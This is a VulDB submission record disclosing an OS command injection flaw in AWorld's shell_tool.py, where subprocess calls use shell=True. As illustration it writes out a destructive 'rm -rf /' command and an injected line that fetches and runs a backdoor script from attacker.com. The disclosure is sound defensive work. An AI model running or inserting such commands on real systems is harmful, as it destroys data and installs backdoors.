| Title | inclusionAI AWorld 0.0 Command Injection |
|---|
| Description | AWorld is a tool designed for building, evaluating, and running General Multi-Agent Assistance. However, it contains a critical security vulnerability in the file `AWorld/aworld/virtual_environments/terminals/shell_tool.py`.
The vulnerability is of the type CWE-78: OS Command Injection. The code in this file makes use of `subprocess.run()` and `subprocess.Popen()` functions to execute user input commands. The concerning aspect is that the `shell` parameter in these functions is set to `True`.
In the `execute` method, when `capture_output` is `True`, `subprocess.run()` is called with `shell=True`, and when `capture_output` is `False`, `subprocess.Popen()` is called with `shell=True`. Similarly, the `execute_async` method also calls `subprocess.Popen()` with `shell=True`.
This setting allows an attacker to inject malicious commands through user input. For instance, if an attacker supplies input like `rm -rf /` in a scenario where the application accepts user shell commands, the malicious command will be executed by the system. In more sophisticated attacks, an attacker could inject commands to download and execute a backdoor script from a remote server, such as `; wget http://attacker.com/backdoor.sh && sh backdoor.sh`, which can lead to unauthorized access and further malicious activities.
More details: https://github.com/inclusionAI/AWorld/issues/38 |
|---|
| Source | ⚠️ https://github.com/inclusionAI/AWorld/issues/38 |
|---|
| User | ybdesire (UID 83239) |
|---|
| Submission | 04/16/2025 05:41 (12 months ago) |
|---|
| Moderation | 04/28/2025 07:56 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 306395 [inclusionAI AWorld up to 8c257626e648d98d793dd9a1a950c2af4dd84c4e shell_tool.py subprocess.run/subprocess.Popen os command injection] |
|---|
| Points | 20 |
|---|